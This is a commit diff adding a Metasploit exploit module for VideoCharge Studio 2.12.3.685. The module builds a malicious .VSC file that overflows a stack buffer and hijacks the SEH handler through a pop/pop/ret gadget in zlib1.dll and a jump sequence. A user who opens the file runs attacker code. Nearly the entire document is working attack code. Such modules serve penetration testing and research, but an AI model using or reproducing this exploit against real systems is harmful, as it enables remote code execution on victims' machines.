Added VideoCharge Studio File Format Exploit

modules/exploits/windows/fileformat/videocharge_studio.rb

@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)',
+      'Description'  => %q{
+          This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
+          processing a specially crafted .VSC file. This vulnerability could be
+          exploited by a remote attacker to execute arbitrary code on the target
+          machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'metacom',  # Original discovery
+          'Andrew Smith',  # MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '69616' ],
+          [ 'CVE', '' ],
+          [ 'EBD', '29234' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+          'DisableNops' => true,
+        },
+
+      'Targets'    =>
+        [
+          [ 'VideoCharge Studio 2.12.3.685',
+            {
+              'Ret'     =>  0x61B811F1, #p/p/r | zlib1.dll
+              'Offset'  =>  824
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Oct 27 2013',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
+
+  end
+
+  def exploit
+
+    buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
+    buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
+    buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
+    buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
+    buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
+    buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70"
+    buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A"
+    buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
+    buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
+    buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
+    buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
+    buffer << make_nops(target['Offset']-payload.encoded.length)
+    buffer << payload.encoded
+    buffer << "\xeb\x06\x90\x90" #nseh negative jump
+    buffer << [target.ret].pack("V")
+    buffer << "\xe9\x3f\xfd\xff\xff" #long jump
+    buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
+    buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
+    buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"
+    buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C"
+    buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(buffer)
+
+  end
+end
+